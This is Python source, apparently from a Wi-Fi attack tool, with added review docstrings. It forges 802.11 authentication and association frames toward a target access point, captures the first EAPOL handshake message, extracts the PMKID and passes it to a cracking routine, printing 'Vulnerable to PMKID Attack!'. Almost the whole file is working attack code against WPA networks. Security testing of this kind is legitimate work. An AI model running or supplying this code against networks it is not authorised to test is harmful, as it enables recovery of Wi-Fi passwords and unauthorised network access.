def asso_conn(self):
    """Transmit association requests until the sniffer thread reports progress.

    When ``self.__ASSO_STATUS`` is false, ``self.asso_sniffer`` is first
    started on ``self.iface`` in a daemon thread.  This method never writes
    ``self.__ASSO_STEP`` itself; it only polls the flag, so that thread
    (presumably via ``get_asso_resp`` on this page, which does set the flag)
    is the only thing that can end the loop early.  Each iteration logs one
    line, sends ``self.asso`` once, sleeps 2 seconds and counts a retry;
    after ``self.retry_limit`` retries the loop logs, sleeps 30 seconds and
    gives up.

    Returns:
        ``self.__ASSO_STEP`` as it stands at exit -- true only if the sniffer
        set it before the retry limit was reached.

    NOTE(review): the double-underscore attributes are name-mangled to the
    enclosing class, whose header is not on this page; where their initial
    values and ``self.asso`` are set up is not visible here -- confirm.
    """
    if not self.__ASSO_STATUS:
        asso_catcher = threading.Thread(target=self.asso_sniffer, args=(self.iface,), name="Association Depender")
        asso_catcher.daemon = True  # do not keep the interpreter alive for this thread
        asso_catcher.start()
    _retry = 0
    while not self.__ASSO_STEP:
        # _randn_ refreshes self._randn, the number printed as "%i Frames" below.
        # It is a display value only: sendp() is always called with count=1.
        self._randn_(4)
        if self.verbose:
            # org(addr).org is a helper defined elsewhere; its value is printed
            # beside each address.  self.pull.* are colour codes / log methods.
            self.pull.up("%i Frames %s (%s) %s>%s %s (%s) %s[Association Request]%s" % \
                (self._randn, self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END,\
                self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.BLUE, self.pull.END))
        else:
            self.pull.up("%i Frames %s %s>%s %s %s[Association Request]%s" % (self._randn, self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\
                self.ap.replace(':', '').upper(), self.pull.BLUE, self.pull.END))
        # One frame every two seconds, for at most retry_limit iterations: this
        # fixed cadence is the whole on-air footprint of the loop.
        sendp(self.asso, iface=self.iface, count=1, verbose=False)
        time.sleep(2); _retry += 1
        if _retry >= self.retry_limit:
            # Give-up path: the 30 s sleep happens here, before returning to the
            # caller; the "restart" mentioned in the message is not done here.
            self.pull.right("Maximum Limit Reached for Association Requests.")
            self.pull.info("Sleeping! Would restart the process in 30 seconds. ")
            time.sleep(30)
            break
    return self.__ASSO_STEP
def _randn_(self, _max):
    """Refresh ``self._randn``, the frame count shown in the "%i Frames" log lines.

    A non-zero ``self._nframes`` is taken verbatim as a fixed count.  When it
    is zero the value is delegated to ``org().randomness(_max, self._randn)``,
    a helper defined elsewhere in the project, with the previous value passed
    through as its second argument.

    Args:
        _max: forwarded unchanged to ``org().randomness``.

    Returns:
        None; the result is stored on ``self._randn``.
    """
    fixed_count = self._nframes
    if fixed_count != 0:
        # Caller pinned the count: no randomness involved.
        self._randn = fixed_count
        return
    self._randn = org().randomness(_max, self._randn)
def get_asso_resp(self, pkt):
    """Per-packet callback: watch for the AP's association response, then EAPOL.

    Presumably installed as the ``prn`` callback of the sniff loop run by
    ``asso_sniffer`` (not on this page) -- confirm.  Two independent checks:

    * A ``Dot11AssoResp`` with ``status == 0`` whose addr1/addr2 match
      ``self.cl``/``self.ap`` (colon-stripped) is only logged; no state changes.
    * An ``EAPOL`` frame from ``self.ap`` whose ``nonce`` slice is non-zero and
      whose ``mic`` slice is all zeros sets ``self.__ASSO_STEP``, stores the
      frame in ``self.__EAPOL`` and raises ``ValueError`` -- presumably the
      mechanism used to break out of the sniff loop; confirm in the caller.

    NOTE(review): a second ``get_asso_resp`` appears later on this page; if
    both live in the same class the later definition replaces this one.
    NOTE(review): the nonce/mic offsets are hard-coded slices of the
    hexlified ``Raw`` payload, compared against ``str`` literals -- this
    assumes ``binascii.hexlify`` returns ``str`` (Python 2 semantics); and
    ``pkt.getlayer(Raw)`` is not checked for ``None`` before ``.load``.
    """
    if pkt.haslayer(Dot11AssoResp):
        if pkt.getlayer(Dot11AssoResp).status == 0:
            sn = pkt.getlayer(Dot11).addr2.replace(':', '')  # sender
            rc = pkt.getlayer(Dot11).addr1.replace(':', '')  # receiver
            if rc == self.cl.replace(':', '') and sn == self.ap.replace(':', ''):
                self.pull.info("1 Frames %s > %s %s[Association Response]%s" % (self.ap.replace(':', '').upper(),\
                    self.cl.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
                if self.verbose:
                    self.pull.info("Association with Access Point %s[SuccessFull]%s" % (self.pull.GREEN, self.pull.END) )
                    self.pull.info("Waiting For EAPOL to initate...")
    if pkt.haslayer(EAPOL):
        sn = pkt.getlayer(Dot11).addr2.replace(':', '')
        nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
        mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
        # All-zero sentinels the slices are compared against.
        fNONCE = "0000000000000000000000000000000000000000000000000000000000000000"
        fMIC = "00000000000000000000000000000000"
        if sn == self.ap.replace(':', '') and nonce != fNONCE and mic == fMIC:
            self.__ASSO_STEP = True  # polled by asso_conn's loop
            self.pull.up("EAPOL %s > %s %s[1 of 4]%s" % (self.ap.replace(':', '').upper(), self.cl.replace(':', '').upper(),\
                self.pull.BOLD+self.pull.GREEN, self.pull.END) )
            if self.verbose:
                self.pull.info("Successfull handshake initiated [%s]" % org(self.ap).org)
            self.__EAPOL = pkt  # kept for crack() on this page
            raise ValueError
def dev_conn(self):
    """Transmit authentication frames until the sniffer thread reports progress.

    Starts ``self.auth_sniffer`` on ``self.iface`` in a daemon thread, then
    loops while ``self.__AUTH_STEP`` is false: log one line, send ``self.auth``
    twice, stop if ``self.__AUTH_STATUS`` has been cleared, otherwise sleep
    1 second.  Unlike ``asso_conn`` there is no retry limit here; only the
    sniffer thread (presumably via ``get_auth_resp`` on this page, which sets
    the flag) or a false ``__AUTH_STATUS`` ends the loop.

    Returns:
        ``self.__AUTH_STEP`` as it stands at exit.

    NOTE(review): both flags are name-mangled to the enclosing class, whose
    header and initialisation are not on this page -- confirm where
    ``__AUTH_STATUS`` is cleared; nothing visible here writes it.
    """
    auth_catcher = threading.Thread(target=self.auth_sniffer, args=(self.iface,), name="Authentication Catcher")
    auth_catcher.daemon = True  # do not keep the interpreter alive for this thread
    auth_catcher.start()
    while not self.__AUTH_STEP:
        # Display value only (see _randn_); the send below always uses count=2.
        self._randn_(3)
        if self.verbose:
            self.pull.up("%i Frames %s (%s) %s>%s %s (%s) %s[Open Authentication]%s" % \
                (self._randn, self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END,\
                self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.BLUE, self.pull.END))
        else:
            self.pull.up("%i Frames %s %s>%s %s %s[Open Authentication]%s" % (self._randn, self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\
                self.ap.replace(':', '').upper(), self.pull.BLUE, self.pull.END))
        # Two frames per iteration, one iteration per second, open-ended.
        sendp(self.auth, iface=self.iface, count=2, verbose=False)
        if not self.__AUTH_STATUS:
            break
        time.sleep(1)
    return self.__AUTH_STEP
def get_auth_resp(self, pkt):
    """Per-packet callback: detect the AP's authentication reply to ``self.cl``.

    Presumably the ``prn`` callback of the sniff loop run by ``auth_sniffer``
    (not on this page) -- confirm.  Only frames carrying both ``RadioTap`` and
    ``Dot11Auth`` are considered; the frame must be addressed from ``self.ap``
    to ``self.cl`` (both compared colon-stripped).  On a match the reply is
    logged, ``self.__AUTH_STEP`` is set (polled by ``dev_conn``) and
    ``ValueError`` is raised -- presumably to break out of the sniff loop.

    Note that ``Dot11Auth`` status/sequence fields are not inspected: any
    authentication frame on the matching address pair counts as success.
    """
    if pkt.haslayer(RadioTap):
        if pkt.haslayer(Dot11Auth):
            sn = pkt.getlayer(Dot11).addr2.replace(':', '')  # sender
            rc = pkt.getlayer(Dot11).addr1.replace(':', '')  # receiver
            if rc == self.cl.replace(':', '') and sn == self.ap.replace(':', ''):
                if self.verbose:
                    self.pull.info("Received %s (%s) %s<%s %s (%s) %s[Open Authentication]%s" % \
                        (self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END, self.ap.replace(':', '').upper(),\
                        self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.YELLOW, self.pull.END))
                    self.pull.info("Authentication %s (%s) %s>%s %s (%s) %s[SuccessFull]%s" % \
                        (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
                        self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.GREEN, self.pull.END))
                else:
                    self.pull.info("Received %s %s<%s %s %s[Open Authentication]%s" % (self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\
                        self.ap.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
                    self.pull.info("Authentication %s %s>%s %s %s[SuccessFull]%s" % \
                        (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
                        self.pull.GREEN, self.pull.END))
                self.__AUTH_STEP = bool(1)  # i.e. True; read by dev_conn's loop
                raise ValueError
def get_asso_resp(self, pkt):
    """Per-packet callback: log the association response, then wait for EAPOL.

    A second, more verbose variant of the ``get_asso_resp`` earlier on this
    page; if both are defined in the same class this later one wins.
    Presumably the ``prn`` callback of the sniff loop run by ``asso_sniffer``
    (not on this page) -- confirm.  Two independent checks:

    * A ``Dot11AssoResp`` with ``status == 0`` addressed from ``self.ap`` to
      ``self.cl`` is logged.  The "Authentication ... / EAPOL ... Waiting"
      pair is printed only once, guarded by ``self.__M_PLACED``, which is set
      here on first use.
    * An ``EAPOL`` frame from ``self.ap`` whose ``nonce`` slice is non-zero and
      whose ``mic`` slice is all zeros sets ``self.__ASSO_STEP``, stores the
      frame in ``self.__EAPOL`` and raises ``ValueError("EAPOL")`` --
      presumably how the sniff loop is stopped; confirm in the caller.

    NOTE(review): the nonce/mic offsets are hard-coded slices of the
    hexlified ``Raw`` payload, compared against ``str`` literals -- this
    assumes ``binascii.hexlify`` returns ``str`` (Python 2 semantics); and
    ``pkt.getlayer(Raw)`` is not checked for ``None`` before ``.load``.
    """
    if pkt.haslayer(Dot11AssoResp):
        if pkt.getlayer(Dot11AssoResp).status == 0:
            sn = pkt.getlayer(Dot11).addr2.replace(':', '')  # sender
            rc = pkt.getlayer(Dot11).addr1.replace(':', '')  # receiver
            if rc == self.cl.replace(':', '') and sn == self.ap.replace( ':', ''):
                if self.verbose:
                    self.pull.info("Received %s (%s) %s<%s %s (%s) %s[Association Response]%s" % \
                        (self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END, self.ap.replace(':', '').upper(),\
                        self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.YELLOW, self.pull.END))
                else:
                    self.pull.info("Received %s %s<%s %s %s[Association Response]%s" % (self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\
                        self.ap.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
                if not self.__M_PLACED:
                    # Print-once block: __M_PLACED is set at the end of it.
                    if self.verbose:
                        self.pull.info("Authentication %s (%s) %s>%s %s (%s) %s[SuccessFull]%s" % \
                            (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
                            self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.GREEN, self.pull.END))
                        self.pull.info("EAPOL %s (%s) %s>%s %s (%s) %s[Waiting...]%s" % \
                            (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
                            self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.PURPLE, self.pull.END))
                    else:
                        self.pull.info("Authentication %s %s>%s %s %s[SuccessFull]%s" % \
                            (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
                            self.pull.GREEN, self.pull.END))
                        self.pull.info("EAPOL %s %s>%s %s %s[Waiting...]%s" % \
                            (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
                            self.pull.PURPLE, self.pull.END))
                    self.__M_PLACED = bool(1)  # i.e. True
    if pkt.haslayer(EAPOL):
        sn = pkt.getlayer(Dot11).addr2.replace(':', '')
        nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
        mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
        # All-zero sentinels the slices are compared against.
        fNONCE = "0000000000000000000000000000000000000000000000000000000000000000"
        fMIC = "00000000000000000000000000000000"
        if sn == self.ap.replace(':', '') and nonce != fNONCE and mic == fMIC:
            self.__ASSO_STEP = True  # polled by asso_conn's loop
            if self.verbose:
                self.pull.info("EAPOL %s (%s) %s>%s %s (%s) %s[Initiated]%s" % (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END , self.pull.RED, self.pull.END,\
                    self.cl.replace(':', '').upper(), \
                    self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.YELLOW, self.pull.END))
                self.pull.up("EAPOL %s (%s) %s>%s %s (%s) %s[1 of 4]%s" % (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END,\
                    self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
                    self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.GREEN, self.pull.END) )
            else:
                self.pull.info("EAPOL %s %s>%s %s %s[Initiated]%s" % (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(), \
                    self.pull.YELLOW, self.pull.END))
                self.pull.up("EAPOL %s %s>%s %s %s[1 of 4]%s" % (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
                    self.pull.BOLD+self.pull.GREEN, self.pull.END) )
            self.__EAPOL = pkt  # kept for crack() on this page
            raise ValueError("EAPOL")
def crack(self, _write):
    """Extract the PMKID slice from the stored EAPOL frame and hand it on.

    Reads ``self.__EAPOL`` (set by ``get_asso_resp``), takes a hard-coded
    slice of its hexlified ``Raw`` payload and treats it as the PMKID.  If
    the slice is neither all zeros nor empty it is logged, passed to
    ``self.save(_write, PMKID)`` and then to ``self.crack_the_pmk(PMKID)``,
    whose result is returned.  Despite the name, no cracking happens in this
    method itself; ``save`` and ``crack_the_pmk`` are defined elsewhere.

    Args:
        _write: forwarded unchanged to ``self.save``; its meaning is not
            visible on this page.

    Returns:
        Whatever ``self.crack_the_pmk`` returns.

    NOTE(review): the "not vulnerable" branch calls ``sys.exit(0)``, i.e. a
    success exit status after an error message, so a wrapping script cannot
    tell the two outcomes apart.  The slice is compared against ``str``
    literals, which assumes ``binascii.hexlify`` returns ``str`` (Python 2
    semantics); ``getlayer(Raw)`` is not checked for ``None``.
    """
    fPMKID = '00000000000000000000000000000000'  # all-zero sentinel
    PMKID = binascii.hexlify(self.__EAPOL.getlayer(Raw).load)[202:234]
    if PMKID != fPMKID and PMKID != '':
        self.pull.special("Vulnerable to PMKID Attack!")
        if self.verbose:
            self.pull.up( "PMKID %s (%s) [%s]" % (self.ap.replace(':', '').upper(), self.pull.DARKCYAN + org(self.ap).org + self.pull.END, self.pull.RED + PMKID + self.pull.END))
        else:
            self.pull.up("PMKID %s [%s]" % (self.ap.replace( ':', '').upper(), self.pull.RED + PMKID + self.pull.END))
        self.save(_write, PMKID)
        _pmk = self.crack_the_pmk(PMKID)
        return _pmk
    else:
        # Exits the whole process rather than returning to the caller.
        self.pull.error( "The target AP doesn't contain PMKID field. Not Vulnerable. Try with handshake. " )
        sys.exit(0)